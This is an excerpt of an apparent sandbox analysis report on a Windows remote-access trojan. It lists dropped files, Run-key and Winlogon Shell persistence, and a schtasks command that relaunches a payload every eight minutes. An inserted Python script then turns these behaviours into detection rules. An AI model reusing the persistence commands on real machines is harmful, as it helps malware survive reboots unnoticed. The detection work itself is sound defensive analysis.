Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\vybNluDs.log
Source: C:\Recovery\winlogon.exe | File created: C:\Users\user\Desktop\aEtIhTbg.log
Source: C:\Recovery\winlogon.exe | File created: C:\Users\user\Desktop\WslZMRrk.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\MFrsFgjH.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\lKwWBiIK.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\TDfrhvdw.log
Source: C:\Recovery\winlogon.exe | File created: C:\Users\user\Desktop\LdxTVLQK.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Recovery\winlogon.exe | File created: C:\Users\user\Desktop\tRVOBpwv.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\RAtJMMZA.log
Source: C:\Recovery\winlogon.exe | File created: C:\Users\user\Desktop\rGzNBWQu.log
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | File created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Recovery\winlogon.exe | File created: C:\Users\user\Desktop\BudDliLc.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\vybNluDs.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\tnEMlbYs.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\lKwWBiIK.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\TDfrhvdw.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\RAtJMMZA.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\MFrsFgjH.log
Source: C:\Recovery\winlogon.exe | File created: C:\Users\user\Desktop\LdxTVLQK.log
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\BudDliLc.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\tRVOBpwv.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\rGzNBWQu.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\aEtIhTbg.logJump to dropped file
                                Source: C:\Recovery\winlogon.exeFile created: C:\Users\user\Desktop\WslZMRrk.logJump to dropped file

                                Boot Survival

                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell (6 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ (2 times)
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ (2 times)
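The Boot Survival entries above (a rewritten Winlogon Shell value, HKLM and HKCU Run values, and a schtasks job firing every eight minutes) together with the drops listed earlier (an executable written into System32 by csc.exe, winlogon.exe under C:\Recovery, random-named executables seeded into Program Files subfolders by a process in AppData) translate into a handful of host-triage rules. The Python below is an added example, not part of the Joe Sandbox report or of DCRat. The event records, their field names (type, image, key, value, data, target, cmdline), the allowlists and the threshold are assumptions built to mirror the report's entries and must be mapped onto real telemetry (for instance Sysmon event IDs 1, 11 and 13) before use; the Winlogon Shell data string is constructed, because the report shows the write but not the value written.

```python
import ntpath
import re

# Directories from which a Run value, shell or task target is normally acceptable
# (lower-case, trailing backslash). Assumed allowlist; tighten for your estate.
TRUSTED_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)
# Well-known system binary names that the report shows dropped outside their home.
EXPECTED_HOME = {
    "winlogon.exe": "c:\\windows\\system32\\",
    "securityhealthsystray.exe": "c:\\windows\\system32\\",
}
# Processes that legitimately write executables into System32 (assumed allowlist).
SYSTEM32_WRITERS = {"trustedinstaller.exe", "tiworker.exe", "msiexec.exe"}
MAX_TASK_MINUTES = 15  # a /sc MINUTE task at or below this interval is treated as a watchdog


def _norm(path):
    """Lower-case a Windows path and drop surrounding quotes so comparisons are stable."""
    return path.strip().strip("'\"").lower()


def _first_token(cmdline):
    """Return the executable path of a command line, honouring a quoted first token."""
    s = cmdline.strip()
    if s[:1] in ("'", '"'):
        end = s.find(s[0], 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(None, 1)[0] if s else ""


def _in_trusted_dir(path):
    return _norm(path).startswith(TRUSTED_DIRS)


def _name_out_of_place(path):
    """True when a well-known system binary name sits outside its expected directory."""
    p = _norm(path)
    home = EXPECTED_HOME.get(ntpath.basename(p))
    return home is not None and ntpath.dirname(p) + "\\" != home


def check_registry(ev):
    """Rules for a registry-value-set event with fields key, value, data."""
    hits, key = [], ev["key"].lower()
    if key.endswith("\\windows nt\\currentversion\\winlogon") and ev["value"].lower() == "shell":
        if _norm(ev["data"]) != "explorer.exe":  # anything but the stock shell
            hits.append("winlogon_shell_hijack")
    if key.endswith("\\windows\\currentversion\\run"):
        target = _first_token(ev["data"])
        if not _in_trusted_dir(target):
            hits.append("run_key_untrusted_path")
        if _name_out_of_place(target):
            hits.append("system_name_wrong_dir")
    return hits


def check_file_create(ev):
    """Rules for a file-created event with fields image (the writer) and target."""
    hits, target, writer = [], _norm(ev["target"]), _norm(ev["image"])
    if (target.startswith("c:\\windows\\system32\\") and target.endswith(".exe")
            and ntpath.basename(writer) not in SYSTEM32_WRITERS):
        hits.append("system32_pe_unexpected_writer")  # csc.exe overwriting SecurityHealthSystray.exe
    if _name_out_of_place(target):
        hits.append("system_name_wrong_dir")  # C:\Recovery\winlogon.exe
    if target.startswith(TRUSTED_DIRS[2:]) and target.endswith(".exe") and not _in_trusted_dir(writer):
        hits.append("program_files_pe_from_user_path")  # AppData process seeding Program Files
    return hits


def check_process_create(ev):
    """Rules for a process-created event with fields image and cmdline (schtasks only)."""
    hits = []
    if ntpath.basename(_norm(ev["image"])) != "schtasks.exe":
        return hits
    tokens = re.findall(r'"[^"]*"|\S+', ev["cmdline"])
    flags = {}
    for i, tok in enumerate(tokens):  # map each /switch to its argument, "" when it has none
        if tok.startswith("/"):
            nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
            flags[tok.lower()] = "" if nxt.startswith("/") else nxt
    if "/create" in flags and flags.get("/sc", "").upper() == "MINUTE":
        every = int(flags["/mo"]) if flags.get("/mo", "").isdigit() else 1
        if every <= MAX_TASK_MINUTES:
            hits.append("task_minute_interval")
        if not _in_trusted_dir(_first_token(flags.get("/tr", "").strip('"'))):
            hits.append("task_untrusted_path")
    return hits


CHECKS = {"registry": check_registry, "file": check_file_create, "process": check_process_create}


def triage(events):
    """Return one (rule, image, detail) tuple for every rule each event trips."""
    findings = []
    for ev in events:
        detail = ev.get("target") or ev.get("cmdline") or ev["key"] + "\\" + ev["value"]
        for rule in CHECKS[ev["type"]](ev):
            findings.append((rule, ev["image"], detail))
    return findings


SWS = r"C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
# Constructed events mirroring the report's entries, not captured telemetry; the
# Winlogon Shell data string is invented since the report shows the write, not the value.
SAMPLE_EVENTS = [
    {"type": "registry", "image": SWS, "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
     "value": "Shell", "data": r"explorer.exe, C:\Recovery\winlogon.exe"},
    {"type": "registry", "image": SWS, "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "winlogon", "data": r'"C:\Recovery\winlogon.exe"'},
    {"type": "registry", "image": SWS, "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "SurrogatewebSession", "data": '"' + SWS + '"'},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 '
                '/tr "\'C:\\Program Files (x86)\\msbuild\\Microsoft\\vXKtedDiKZHKptbUFqIBdHmZ.exe\'" /f'},
    {"type": "file", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "target": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    {"type": "file", "image": SWS, "target": r"C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe"},
    {"type": "registry", "image": r"C:\Windows\explorer.exe",  # benign control, trips nothing
     "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "value": "OneDrive",
     "data": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for rule, image, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:32} {ntpath.basename(image):24} {detail}")
```

Run against the constructed events the script reports seven findings across six rules; the OneDrive control entry trips none. The task rule deliberately does not flag the Program Files path used by this sample, because by path alone it is indistinguishable from a vendor updater: the signal for that file comes from the file-create rule (an executable placed under Program Files by a process running out of AppData) and from the eight-minute interval, which is what a practitioner should tune rather than the directory allowlist.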
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
